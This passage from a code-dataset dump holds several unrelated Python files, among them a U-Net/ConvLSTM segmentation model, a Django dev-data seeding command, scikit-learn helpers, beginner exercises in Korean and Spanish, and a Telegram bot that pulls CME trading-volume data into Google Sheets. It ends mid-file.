main(args)\n","repo_name":"hubertjb/dynamic-spatial-filtering","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10505,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"71"}
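An illustrative command line for the training script above; every flag shown is defined in the argparse setup, and the values are examples only:

# python train.py --dataset pc18_debug --model stager_net \
#     --dsf_type dsfd --denoising data_augm --n_epochs 5 --batch_size 64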
+{"seq_id":"15211626411","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom convlstm import ConvLSTMCell\n\n\nclass DoubleConv(nn.Module):\n \"\"\"(convolution => [BN] => ReLU) * 2\"\"\"\n\n def __init__(self, in_channels, out_channels, mid_channels=None):\n super().__init__()\n if not mid_channels:\n mid_channels = out_channels\n self.double_conv = nn.Sequential(\n nn.Conv2d(in_channels, mid_channels, kernel_size=(3, 3), padding=(1, 1)),\n nn.BatchNorm2d(mid_channels),\n nn.ReLU(inplace=True),\n nn.Dropout(0.25),\n\n nn.Conv2d(mid_channels, out_channels, kernel_size=(3, 3), padding=(1, 1)),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.Dropout(0.25)\n )\n\n def forward(self, x):\n return self.double_conv(x)\n\n\nclass Down(nn.Module):\n \"\"\"Downscaling with maxpool then double conv\"\"\"\n\n def __init__(self, in_channels, out_channels):\n super().__init__()\n self.maxpool_conv = nn.Sequential(\n nn.MaxPool2d(2),\n DoubleConv(in_channels, out_channels)\n )\n\n def forward(self, x):\n return self.maxpool_conv(x)\n\n\nclass Up(nn.Module):\n \"\"\"Upscaling then double conv\"\"\"\n\n def __init__(self, in_channels, out_channels, bilinear=True):\n super().__init__()\n\n # if bilinear, use the normal convolutions to reduce the number of channels\n if bilinear:\n self.up = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)\n self.conv = DoubleConv(in_channels, out_channels, in_channels // 2)\n else:\n self.up = nn.ConvTranspose2d(in_channels, in_channels // 2, kernel_size=(2, 2), stride=(2, 2))\n self.conv = DoubleConv(in_channels, out_channels)\n\n def forward(self, x1, x2):\n x1 = self.up(x1)\n # input is CHW\n diffY = x2.size()[2] - x1.size()[2]\n diffX = x2.size()[3] - x1.size()[3]\n\n x1 = F.pad(x1, [diffX // 2, diffX - diffX // 2,\n diffY // 2, diffY - diffY // 2])\n # if you have padding issues, see\n # https://github.com/HaiyongJiang/U-Net-Pytorch-Unstructured-Buggy/commit/0e854509c2cea854e247a9c615f175f76fbb2e3a\n # https://github.com/xiaopeng-liao/Pytorch-UNet/commit/8ebac70e633bac59fc22bb5195e513d5832fb3bd\n x = torch.cat([x2, x1], dim=1)\n return self.conv(x)\n\n\nclass OutConv(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(OutConv, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=(1, 1))\n\n def forward(self, x):\n return nn.Sigmoid()(self.conv(x))\n\n\nclass UNet(nn.Module):\n def __init__(self, n_channels, n_classes, bilinear=True):\n super(UNet, self).__init__()\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n self.n_channels = n_channels\n self.n_classes = n_classes\n self.bilinear = bilinear\n\n self.inc = DoubleConv(n_channels, 64)\n self.down1 = Down(64, 128)\n self.down2 = Down(128, 256)\n self.down3 = Down(256, 512)\n factor = 2 if bilinear else 1\n self.down4 = Down(512, 1024 // factor)\n self.up1 = Up(1024, 512 // factor, bilinear)\n self.up2 = Up(512, 256 // factor, bilinear)\n self.up3 = Up(256, 128 // factor, bilinear)\n self.up4 = Up(128, 64, bilinear)\n self.out = OutConv(64, n_classes)\n\n self.lstm = ConvLSTMCell(input_dim=512, hidden_dim=512, kernel_size=(3, 3), bias=True)\n\n self.classifier = nn.Sequential(\n nn.MaxPool2d((2, 2)),\n\n nn.Conv2d(512, 512, kernel_size=(3, 3)),\n nn.BatchNorm2d(512),\n nn.ReLU(inplace=True),\n nn.Dropout(0.25),\n\n nn.Conv2d(512, 512, kernel_size=(3, 3)),\n nn.BatchNorm2d(512),\n nn.ReLU(inplace=True),\n nn.Dropout(0.25),\n\n nn.Flatten(),\n\n nn.Linear(512 * 4 * 4, 2048),\n 
nn.BatchNorm1d(2048),\n nn.ReLU(inplace=True),\n nn.Dropout(p=0.5),\n\n nn.Linear(2048, 1024),\n nn.BatchNorm1d(1024),\n nn.ReLU(inplace=True),\n nn.Dropout(p=0.5),\n\n nn.Linear(1024, 21), nn.Softmax(dim=-1)\n )\n\n def forward(self, x):\n batch_size = x.shape[0]\n hx = torch.zeros((batch_size, 512, 16, 16)).to(self.device)\n cx = torch.zeros((batch_size, 512, 16, 16)).to(self.device)\n masks = torch.zeros((batch_size, 5, 256, 256)).to(self.device)\n labels = torch.zeros((batch_size, 5, 21)).to(self.device)\n\n # encoder\n x1 = self.inc(x)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n\n # bottleneck\n for i in range(5):\n hx, cx = self.lstm(x5, (hx, cx))\n\n # decoder\n x = self.up1(hx, x4)\n x = self.up2(x, x3)\n x = self.up3(x, x2)\n x = self.up4(x, x1)\n logits = self.out(x)\n masks[:, i, :, :] = logits.squeeze()\n\n # classifier\n labels[:, i, :] = self.classifier(hx)\n\n return masks, labels\n\n\nif __name__ == '__main__':\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n inputs = torch.normal(0, 1, (4, 3, 256, 256), dtype=torch.float32).to(device)\n network = UNet(n_channels=3, n_classes=1)\n network.to(device)\n\n x_, y_ = network(inputs)\n print(x_.shape)\n print(y_.shape)\n","repo_name":"MahmudulAlam/Recurrently-Semantic-Segmentation","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
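The `ConvLSTMCell` imported from the local `convlstm` module is not included in this record. Below is a minimal sketch of a cell exposing the interface the bottleneck loop relies on, `cell(x, (h, c)) -> (h_next, c_next)`, assuming the constructor arguments used above; this is one standard formulation, not necessarily the repo's exact implementation:

```python
import torch
import torch.nn as nn

class ConvLSTMCell(nn.Module):
    """Minimal convolutional LSTM cell; one convolution computes all four gates at once."""

    def __init__(self, input_dim, hidden_dim, kernel_size, bias=True):
        super().__init__()
        self.hidden_dim = hidden_dim
        padding = (kernel_size[0] // 2, kernel_size[1] // 2)  # preserve H and W
        self.conv = nn.Conv2d(input_dim + hidden_dim, 4 * hidden_dim,
                              kernel_size=kernel_size, padding=padding, bias=bias)

    def forward(self, x, state):
        h, c = state
        gates = self.conv(torch.cat([x, h], dim=1))            # (B, 4*hidden, H, W)
        i, f, o, g = torch.split(gates, self.hidden_dim, dim=1)
        i, f, o = torch.sigmoid(i), torch.sigmoid(f), torch.sigmoid(o)
        c_next = f * c + i * torch.tanh(g)                     # update cell state
        h_next = o * torch.tanh(c_next)                        # emit hidden state
        return h_next, c_next
```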
+{"seq_id":"12427852919","text":"#!/usr/bin/env python3\n\nimport sys\nfrom re import findall\n\npattern = sys.stdin.readline().strip()\nwords = []\nfor line in sys.stdin.readlines():\n words.append(line.strip())\n\n#print(pattern)\n#print(words)\n# \"\\b\" Match a word boundary, r = raw string\n# \\w =\n# transform supplied pattern into regex\npattern = r\"\\b\" + pattern.replace(\"-\", r\"\\w\",) + r\"\\b\"\n#print(pattern)\n\ntext = \" \".join(words)\nmatches = findall(pattern, text)\nif len(matches) > 0:\n print(\", \".join(matches))\n","repo_name":"aydenjahola/DCU","sub_path":"year-1/ca117/week-11/pattern_121.py","file_name":"pattern_121.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"6007675833","text":"from datetime import datetime\n\nfrom django.contrib.auth.hashers import make_password\nfrom django.core.management.base import BaseCommand\nfrom django.db import transaction\nfrom django.utils.timezone import make_aware\nfrom django.utils.translation import gettext as _\nfrom guardian.shortcuts import assign_perm\n\nfrom ephios.core.models import Event, EventType, Shift, UserProfile\n\n\ndef create_objects():\n admin_user = UserProfile(\n email=\"admin@localhost\",\n display_name=\"Admin Localhost\",\n date_of_birth=datetime(year=1970, month=1, day=1),\n )\n admin_user.is_staff = True\n admin_user.is_superuser = True\n admin_user.password = make_password(\"admin\")\n admin_user.save()\n\n from django.contrib.auth.models import Group\n\n volunteers = Group.objects.create(name=_(\"Volunteers\"))\n volunteers.user_set.add(admin_user)\n volunteers.save()\n\n planners = Group.objects.create(name=_(\"Planners\"))\n planners.user_set.add(admin_user)\n planners.save()\n\n managers = Group.objects.create(name=_(\"Managers\"))\n managers.user_set.add(admin_user)\n managers.save()\n\n assign_perm(\"publish_event_for_group\", planners, volunteers)\n assign_perm(\"core.add_event\", planners)\n assign_perm(\"core.delete_event\", planners)\n assign_perm(\"core.view_userprofile\", managers)\n assign_perm(\"core.add_userprofile\", managers)\n assign_perm(\"core.change_userprofile\", managers)\n assign_perm(\"core.delete_userprofile\", managers)\n assign_perm(\"auth.view_group\", managers)\n assign_perm(\"auth.add_group\", managers)\n assign_perm(\"auth.change_group\", managers)\n assign_perm(\"auth.delete_group\", managers)\n\n service_type = EventType.objects.create(title=_(\"Service\"))\n EventType.objects.create(title=_(\"Training\"))\n\n user = UserProfile(\n email=\"user@localhost\",\n display_name=\"User Localhost\",\n date_of_birth=datetime(year=1970, month=1, day=1),\n )\n user.password = make_password(\"user\")\n user.save()\n volunteers.user_set.add(user)\n\n event = Event.objects.create(\n title=\"Concert Medical Service\",\n description=\"Your contact is Lisa Example. Her Phone number is 012345678910\",\n type=service_type,\n location=\"Town Square Gardens\",\n active=True,\n )\n\n assign_perm(\"core.view_event\", volunteers, event)\n\n Shift.objects.create(\n event=event,\n meeting_time=make_aware(datetime(2043, 6, 30, 15, 30)),\n start_time=make_aware(datetime(2043, 6, 30, 16, 0)),\n end_time=make_aware(datetime(2043, 7, 1, 1, 0)),\n signup_method_slug=\"instant_confirmation\",\n signup_configuration={\n \"minimum_age\": 18,\n \"signup_until\": make_aware(datetime(2043, 6, 29, 8, 0)),\n },\n )\n\n\nclass Command(BaseCommand):\n help = \"Load some data for development\"\n\n def handle(self, *args, **options):\n if UserProfile.objects.exists():\n self.stdout.write(\"WARNING! User objects already exist in your database.\")\n if input(\"Are you sure you want to continue? (yes/no) \") != \"yes\":\n self.stdout.write(\"Aborting...\")\n return\n with transaction.atomic():\n create_objects()\n self.stdout.write(self.style.SUCCESS(\"Done.\"))\n","repo_name":"ephios-dev/ephios","sub_path":"ephios/core/management/commands/devdata.py","file_name":"devdata.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"71"}
+{"seq_id":"37363889385","text":"import sys\n\nfrom sklearn.decomposition import TruncatedSVD\n\nsys.path.append(\"../\")\nsys.path.append(\"../../\")\nfrom sklearn.linear_model import LogisticRegression\nfrom tc_utils.losses import multiclass_logloss\nfrom ensembling.spooky.grid_search import *\n\ndef lr(xtrain_tfv, ytrain, xvalid_tfv, yvalid):\n # Fitting a simple Logistic Regression on TFIDF\n clf = LogisticRegression(C=1.0)\n clf.fit(xtrain_tfv, ytrain)\n predictions = clf.predict_proba(xvalid_tfv)\n\n print (\"logloss: %0.3f \" % multiclass_logloss(yvalid, predictions))\n\n\ndef lr_svd_gridsearch(train_x, train_y, val_x, val_y):\n # Initialize SVD\n svd = TruncatedSVD()\n\n # Initialize the standard scaler\n scl = preprocessing.StandardScaler()\n\n # We will use logistic regression here..\n lr_model = LogisticRegression()\n\n # Create the pipeline\n clf = pipeline.Pipeline([('svd', svd),\n ('scl', scl),\n ('lr', lr_model)])\n\n param_grid = {'svd__n_components': [120, 180],\n 'lr__C': [0.1, 1.0, 10],\n 'lr__penalty': ['l1', 'l2']}\n\n # Initialize Grid Search Model\n model = GridSearchCV(estimator=clf, param_grid=param_grid, scoring=mll_scorer,\n verbose=10, n_jobs=-1, iid=True, refit=True, cv=2)\n\n # Fit Grid Search Model\n model.fit(train_x, train_y) # we can use the full data here but im only using xtrain\n print(\"Best score: %0.3f\" % model.best_score_)\n print(\"Best parameters set:\")\n best_parameters = model.best_estimator_.get_params()\n for param_name in sorted(param_grid.keys()):\n print(\"\\t%s: %r\" % (param_name, best_parameters[param_name]))\n\n\n","repo_name":"dhiraa/sarvam","sub_path":"src/nlp/text_classification/ensembling/spooky/lr.py","file_name":"lr.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"26128813870","text":"\nimport unittest\nfrom soundforest import metadata\n\nARTWORK_PREFIXES = ['albumart', 'artwork', 'album', 'front', 'back', 'cover']\nARTWORK_FORMATS = ['jpg', 'jpeg', 'png', 'gif']\n\nVALID_PLAYLIST_NAMES = ['foo.pls', 'foo.m3u', 'foo.bar.m3u8']\nINVALID_PLAYLIST_NAMES = ['.m3u', 'foo.mp3', 'foo.ogg']\n\n\nclass test_metadata(unittest.TestCase):\n\n def setUp(self):\n self.metadata = metadata.Metadata()\n\n def tearDown(self):\n del self.metadata\n\n def test_registration(self):\n\n class validTestClass(metadata.MetadataFileType):\n def __init__(self, path=None):\n super(validTestClass, self).__init__(path, filenames=['foo'])\n\n class invalidTestClass(list):\n def __init__(self):\n return\n\n self.metadata.add_metadata(validTestClass())\n with self.assertRaises(ValueError):\n self.metadata.add_metadata(invalidTestClass())\n\n def test_artwork_files(self):\n \"\"\"\n Test artwork names for metadata matches\n \"\"\"\n ARTWORK_NAMES = [\n '{}.{}'.format(name, ext)\n for name in ARTWORK_PREFIXES for ext in ARTWORK_FORMATS\n ]\n for name in ARTWORK_NAMES:\n m = self.metadata.match(name)\n self.assertIsNotNone(m, 'No match for artwork file {}'.format(name))\n self.assertEqual(m.description, 'Album Artwork')\n\n def test_playlist_files(self):\n for name in VALID_PLAYLIST_NAMES:\n m = self.metadata.match(name)\n self.assertIsNotNone(m, 'No match for playlist file {}'.format(name))\n self.assertEqual(m.description, 'm3u playlist')\n\n for name in INVALID_PLAYLIST_NAMES:\n m = self.metadata.match(name)\n self.assertIsNone(m, 'Invalid name matches metadata: {}'.format(name))\n\n\nsuite = unittest.TestLoader().loadTestsFromTestCase(test_metadata)\n","repo_name":"hile/musa","sub_path":"test/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"6351691673","text":"# 80점 (5번 입력 오답)\n\nN = int(input())\nnums = tuple(map(int, input().split()))\nnums1 = []\nnums2 = []\nnums3 = []\n\n# 3으로 나눈 나머지에 따라 숫자들을 나눔\nfor num in nums:\n if num % 3 == 1:\n nums1.append(num)\n elif num % 3 == 2:\n nums2.append(num)\n else:\n nums3.append(num)\n\n# 나머지가 1인 숫자만 혹은 나머지가 2인 숫자만 있는 경우 그냥 정렬만 하면 됨\nif len(nums3) == 0 and (len(nums1) == 0 or len(nums2) == 0):\n print(*sorted(nums))\n# 나머지가 1인 숫자와 나머지가 2인 숫자가 존재하는데 3의 배수인 숫자가 없으면 불가능\n# - 나머지 1인 숫자와 나머지 2인 숫자가 인접하는 경우가 생김 -> 합치면 3의 배수\n# 3의 배수의 개수가 나머지 1인 숫자, 나머지 2인 숫자 개수의 합보다 1개를 초과해서 더 많으면 불가능\n# - 3의 배수끼리 인접하는 경우가 생김 -> 합치면 3의 배수\n# 이 조건이 아닌 경우 모두 가능함\nelif len(nums3) > len(nums1) + len(nums2) + 1 or len(nums3) == 0:\n print(-1)\n# 3의 배수의 개수가 나머지 1인 숫자, 나머지 2인 숫자 개수의 합보다 1개 더 많은 경우\n# - 3의 배수 사이에 다른 숫자들이 1개씩 들어감\nelif len(nums3) == len(nums1) + len(nums2) + 1:\n result = []\n nums3.sort()\n k = 0\n for num in sorted(nums1 + nums2):\n result.append(nums3[k])\n result.append(num)\n k += 1\n result.append(nums3[-1])\n print(*result)\n# 나머지 1인 숫자가 없거나 나머지 2인 숫자가 없는 경우\n# - 3의 배수끼리만 인접하지 않도록 잘 배열\nelif len(nums1) == 0 or len(nums2) == 0:\n result = []\n if len(nums1) == 0:\n nums1 = nums2\n nums1.sort()\n nums3.sort()\n i = 0\n k = 0\n if nums3[0] < nums1[0]:\n result.append(nums3[0])\n k += 1\n while len(nums1) - i > len(nums3) - k > 0:\n result.append(nums1[i])\n i += 1\n while len(nums1) - i >= len(nums3) - k > 0 and nums1[i] < nums3[k]:\n result.append(nums1[i])\n i += 1\n result.append(nums3[k])\n k += 1\n while len(nums3) > k:\n result.append(nums1[i])\n result.append(nums3[k])\n i += 1\n k += 1\n result += nums1[i:]\n print(*result)\n# 모든 종류의 숫자가 존재하는 경우\n# - 3의 배수를 칸막이로 생각하고 3의 배수 사이에는 같은 종류의 숫자만 들어가도록 잘 배열\nelse:\n result = []\n nums1.sort()\n nums2.sort()\n nums3.sort()\n i = 0\n j = 0\n k = 0\n if len(nums3) != 1 and nums3[0] < nums1[0] and nums3[0] < nums2[0]:\n result.append(nums3[0])\n k += 1\n while len(nums1) + len(nums2) - i - j > len(nums3) - k > 0:\n if k == len(nums3) - 1 and len(nums1) > i and len(nums2) > j:\n if nums1[i] < nums2[j]:\n result += nums1[i:]\n result.append(nums3[k])\n result += nums2[j:]\n else:\n result += nums2[j:]\n result.append(nums3[k])\n result += nums1[i:]\n i = len(nums1)\n j = len(nums2)\n k = len(nums3)\n break\n elif len(nums2) == j or nums1[i] < nums2[j]:\n result.append(nums1[i])\n i += 1\n while len(nums1) + len(nums2) - i - j >= len(nums3) - k > 0 and nums1[i] < nums3[k]:\n result.append(nums1[i])\n i += 1\n result.append(nums3[k])\n k += 1\n elif len(nums1) == i or nums1[i] > nums2[j]:\n result.append(nums2[j])\n j += 1\n while len(nums1) + len(nums2) - i - j >= len(nums3) - k > 0 and nums2[j] < nums3[k]:\n result.append(nums2[j])\n j += 1\n result.append(nums3[k])\n k += 1\n while k < len(nums3):\n if len(nums2) == j or nums1[i] < nums2[j]:\n result.append(nums1[i])\n i += 1\n result.append(nums3[k])\n k += 1\n elif len(nums1) == i or nums1[i] > nums2[j]:\n result.append(nums2[j])\n j += 1\n result.append(nums3[k])\n k += 1\n result += nums1[i:]\n result += nums2[j:]\n print(*result)","repo_name":"jmkim0/algorithm_study","sub_path":"weekly_study_group/Week 7/07-체셔의_3의_배수_혐오.py","file_name":"07-체셔의_3의_배수_혐오.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4593674545","text":"#esto es un comentario\nif 5 > 3:\n #print(\"5 es mayor a 3\")\n var = 1\n\nx = 5\ny = \"chanchito feliz\"\n\n#print(x,y)\n\na, b, c = 'la', 'le', 'li'\n#print(a,b,c)\n\nval1 = val2 = val3 = \"nada\"\n#print(val1, val2, val3)\n\ninicio = \"hola \"\nfinal = \"mundo\"\n\n#print(inicio+final)\n\npalabra = 'comilla simple' #string\npalabra2= \"comillas dobles\" #string\n\nentero = 20 #integer\nconDecimales = 20.2 #float\ncomplejo = 1j\n\n#print(palabra, palabra2, entero, conDecimales, complejo)\n\nlista = [1,2,3,3, \"carro\", \"bici\"]\nlista2 = lista.copy()\nlista.append(4)\n#lista.clear()\n#print(lista, lista2.count(3))\n#print(len(lista))\n#print(lista[0])\n\n#lista.pop()#elimina el ultimo elemento de la lista\n#print(lista)\n\n#lista.remove(\"carro\") #elimina elemento por su valor\n#print(lista)\n\nlista.reverse()\n#lista.sort() #no deja ordenarla porque tiene tipos de datos diferentes\n#print(lista)\n\n#las tuplas no se pueden cambiar una vez creadas\ntupla = (\"hola\", \"mundo\", \"somos\", \"tupla\")\n#print(tupla.count(\"hola\"))\n#print(tupla.index(\"somos\"))\n#print(tupla[2])\n\nlistaDeTupla = list(tupla)\nlistaDeTupla.append(\"otra tupla\")\n#print(listaDeTupla)\n\nrango = range(6)\n#print(rango)\n\ndiccionario = {\n \"nombre\":\"Chanchito feliz\",\n \"raza\":\"persa\",\n \"edad\":5\n}\n\n#print(diccionario)\n#print(diccionario['nombre'])\n#print(diccionario.get('raza'))\ndiccionario['nombre'] = \"Fluffy\"\n#print(diccionario)\n#print(len(diccionario))\n\ndiccionario['ronronea'] = \"Si\" #sino existe lo agrega al diccionario\n#print(diccionario)\ndiccionario.pop('ronronea') #elimina el elemento del diccionario con el nombre espesificado\n#print(diccionario)\ndiccionario.popitem() #elimina el ultimo elemento del diccionario\n#print(diccionario)\ndel diccionario['raza'] #elimina el elemento del diccionario por llave\n#print(diccionario)\ncopiaDiccionario = diccionario.copy()\ncopiaDiccionario2 = dict(diccionario) #otra manera de copiar los diccionarios\n#print(copiaDiccionario)\ndiccionario.clear() #elimina todos los elementos del diccionario\n#print(diccionario)\n\nfloffy = {\n \"nombre\":\"Floffy\",\n \"edad\":4\n }\n\ngatos = {\n \"Floffy\":floffy,\n \"Mamba\":{\n \"nombre\":\"Black Mamba\",\n \"edad\":12\n }\n}\n\n#print(gatos)\n\nperros = dict(nombre = \"chanchito feliz\", edad=6) #crea un diccionario\n#print(perros)\n\nverdadero = True\nfalso = False\nprint(verdadero, falso)","repo_name":"ervinsv92/CursoPython","sub_path":"intro-python/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"14318562460","text":"from cgitb import text\nfrom email import message\nfrom email.policy import HTTP\nfrom re import M\nfrom time import time\nfrom urllib.error import HTTPError\nfrom xml.dom.minidom import Document\nimport requests\nimport json\nimport datetime\nimport sched, time\nimport logging\n\n\nimport telegram\nimport constants as keys\nimport responses as R\n\nfrom datetime import date, datetime, timedelta\n#Google Auth for Sheets API:\nfrom googleapiclient.discovery import build\nfrom google.oauth2 import service_account\nfrom telegram.ext import * \n\n##Dependencies##\n#telegram-bot\n#requests\n#openpyxl #Für excel\n#googleapiclient pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib\n\n\ndef send_file(file, chat_id):\n bot = telegram.Bot(keys.API_KEY)\n\n with open(file, 'r') as f:\n bot.send_document(chat_id = chat_id, document = f )\n f.close()\n\n\ndef delete_logfile(file):\n with open(file, 'a') as f:\n f.truncate(0)\n\n\n\n# Telegram Bot Functions #\n\ndef start_command(update, context):\n update.message.reply_text(\"Willkommen beim Craw-Bot. Für Hilfe: /help\")\n\ndef help_command(update, context):\n update.message.reply_text(\"/log : Gibt die Log-Datei zurück. \\n/craw : Startet das Script \\n/clear : Löscht die log-Datei \")\n\ndef log_command(update, context):\n chat_id = update.effective_chat.id\n send_file('logCraw.log',chat_id)\n\ndef clear_command(update, context):\n update.message.reply_text('Log Datei gelöscht!')\n delete_logfile('logCraw.log')\n \n\ndef hanlde_message(update, context):\n text = str(update.message.text).lower()\n response = R.sample_responses(text)\n update.message.reply_text(response)\n\ndef craw_command(update, context):\n update.message.reply_text(\"Gestartet\")\n main(s, True)\n\ndef error(update, context):\n print(f\"Update {update} caused error {context.error}\")\n\n######################\n\n# Call the Sheets API #\n\nSERVICE_ACCOUNT_FILE = 'keys.json'\nSCOPES = ['https://www.googleapis.com/auth/spreadsheets']\n\ncreds = None\ncreds = service_account.Credentials.from_service_account_file(\n SERVICE_ACCOUNT_FILE, scopes=SCOPES)\n\n# Online # \nSAMPLE_SPREADSHEET_ID = keys.SAMPLE_SPREADSHEET_ID\n##########\n\n\n# TEST #\n#SAMPLE_SPREADSHEET_ID = keys.SAMPLE_SPREADSHEET_ID_TEST\n########\nservice = build('sheets', 'v4', credentials=creds)\n\nsheet = service.spreadsheets()\n\n#######################\n\n#### Logging #####\nlogging.basicConfig(filename=\"logCraw.log\", level=logging.INFO, format='%(asctime)s - %(message)s')\n#################\n\n#### Set trade Date ####\ndatum = (datetime.now() - timedelta(1))\ndatum_weekday = datum.weekday()\n\nif(datum_weekday < 5): \n # Datum is Weekday\n tradeDate = datum.strftime('%Y%m%d')\nelif(datum_weekday == 5):\n # If Datum = Saturday -> Datum - OneDay\n tradeDate = (datum - timedelta(1)).strftime('%Y%m%d')\nelif(datum_weekday == 6):\n # IF Datum = Sunday -> Datum - 2 Days\n tradeDate = (datum - timedelta(2)).strftime('%Y%m%d')\n#########################\n\nheaders = {\n \"Accept\": \"application/json\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"User-Agent\": \"Mozilla/5.0\"\n}\n\nlogging.info(\"START craw.py\")\ns = sched.scheduler(time.time, time.sleep)\n\ndef BeautifulPrintouts(forw):\n\n if(forw == \"start\"):\n print( \"\"\"\\n \n ....... \n :::::=@@@@@@@-::::. \n .::-%@@%%%*******#%@@@#::::::::::::::::::. 
\n .---*%%%******************#%%%%%%%%####%%%%%%*------- \n .=*%%%#******#%%%#*****************************#%%%%%%%===- \n =+%#*********%#*#@%%#***********************************%%%#=- \n ++%#***********@@+*#%@%****************####***##########*****#%#+- \n @@*************%%@@%%%#************#####%%%########%%%%@#******#%#+: \n **@@*************##%%%%#*************#####%%%%%%###*###%%%%%*******%@= \n +#****%%%%@@@%#******###***********#####***##%%%##%%%###%%%%@@***###*####: \n +#*+====+++++++#%@@##*********+++*****##%######%###%%%%%%%%%%%%###*#%#*##@@- \n =#*+====*****#%%%@@@@@@####****+***###****##%%%%###%%%%%%%%%%%%%%*%#+#%#*#%##%%. \n =%*+==+*****@@@#+++++=--=@@@@%##%###%%%%####***####%%%%%%%%%%%%%%%%##%@%*###*#%@@: \n -@#===+*****@%-=+-.:---%@@@**@@%###*****%#%%%%%%%#%%%%%%%%#%%%%%%%##%%%%@@*#%#*#%@@: \n -@#=+***%@@@--:-+=-*@@@+=**@@%%%%%%%#░█████╗░██████╗░░█████╗░░██╗░░░░░░░██╗░░░*#%#*@@\n :@%=+***%@+===++**@@@*==+****@@%%%%%%%%██╔══██╗██╔══██╗██╔══██╗░██║░░██╗░░██║░░░%%%##@@\n :-%#++*#%*+::--=+%#++++*****@@%%%%%%%%%%██║░░╚═╝██████╔╝███████║░╚██╗████╗██╔╝░░░%%%%%@@\n .@%=+##%+:=+=+%%%#++****#########%%%%#%%%██║░░██╗██╔══██╗██╔══██║░░████╔═████║░░░░%%%%%@@\n --%#**%*=-:+*#%++++**###****. .***#%%%%╚█████╔╝██║░░██║██║░░██║░░╚██╔╝░╚██╔╝░██╗@%%%%@@\n @@=+@#===+###++****##**+: =@%##░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░╚═╝@%%%%@@\n @@###+:=**#*+**####+- :+*##%%%%%%%%%%%%%%%####%%%%%%%%%%%%###%%%%%%%@%%%%@@\n ===-:-**#*+#%%%===- +@%#%%%#%%%%%%%#%%%%%%%%#%%%%%%%###%%%%%%%@@%@@@@+=\n .***##%%+--- :-#%##%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@@@@%%%@@+- \n :@@%+---. :-#%%%%%%%%%%%%%%%#%%%%%%%%%%%%%%%@@@@%%%%%@@- \n @@##%%@@@@@@@@@@@@@@@@@@@@%%%%%%@@%%%%%@@- \n @@##%%@*.*@%%%%%#%%%%%%%@@%%%%@@%%%%%%%%%%%. \n *%@@%%@* #@#*##%%%%%%%%%@@@%%##%%%%%%%%@@: \n *@**@# #@*#%%%%#%%%%@@*=%#*%%%@@@%%@@: \n #@+=@@ #@###%%###%%%@@**@@%%%%@+ +@@@. \n .*@#*%# @@*#@@%####@@+=@@%%%%@+ \n +@*+%@ ####@* -###@@+=@@##%%@+ \n .:*%#### ###+ =#@@+=@% .###= \n =@#+%@. #@++@@ \n .-+###**. #@**@@ \n =+#*+#@- #@**@% \n =+++#*++*%@- :+++*#**@% \n =+**###*+*%##*+. .+*#@@+=####+= \n %@==%%@%+#@#*%@. .***#%@@*+@@**@# \n %@%#-=@@%*-*%@@. :@@%*-#@@%--%%@# \n :::: :::. .::: :::. .::: :::. 
\n \"\"\" )\n\n if(forw == \"end\"): \n print(\"\"\" \\n \n ███████╗██╗███╗░░██╗██╗░██████╗██╗░░██╗██╗\n ██╔════╝██║████╗░██║██║██╔════╝██║░░██║██║\n █████╗░░██║██╔██╗██║██║╚█████╗░███████║██║\n ██╔══╝░░██║██║╚████║██║░╚═══██╗██╔══██║╚═╝\n ██║░░░░░██║██║░╚███║██║██████╔╝██║░░██║██╗\n ╚═╝░░░░░╚═╝╚═╝░░╚══╝╚═╝╚═════╝░╚═╝░░╚═╝╚═╝\n \"\"\")\n\ndef checkTradeDate(tradeDate_data, tradeDate, url_id, params):\n\n ###########\n # This function lowers the trade date if there is no data \n # Attention: param tradeDate is already Weekday\n # So the function checks when the last update has been and sets the tradeDate;\n ###########\n\n #While Array Len == 0 -> tradeDate nicht richtig -> Minus as long as tradeDate_data is empty\n #While Array Len > 0 -> tradeDate richtig\n\n while(len(tradeDate_data[\"monthData\"]) == 0):\n tradeDateInt = int(tradeDate) - 1\n tradeDate = str(tradeDateInt)\n \n newUrl = \"https://www.cmegroup.com/CmeWS/mvc/Volume/Details/F/\"+ url_id +\"/\"+ tradeDate + \"/P\"\n try: #CME-Group\n response = requests.get(newUrl, params=params, headers=headers) #URL\n response.raise_for_status()\n except requests.exceptions.Timeout:\n logging.exception(\"Exception occured (timeout) - Connect to CME - CheckTradeDate\")\n print(\"time-out\")\n except requests.exceptions.ConnectionError:\n logging.exception(\"Exception occured (conn err) - Connect to CME - CheckTradeDate\")\n print('Connection Error')\n except requests.exceptions.HTTPError:\n logging.exception(\"Exception occured (Bad Gateway) - Test? -CheckTradeDate\")\n print(\"BadGateway - 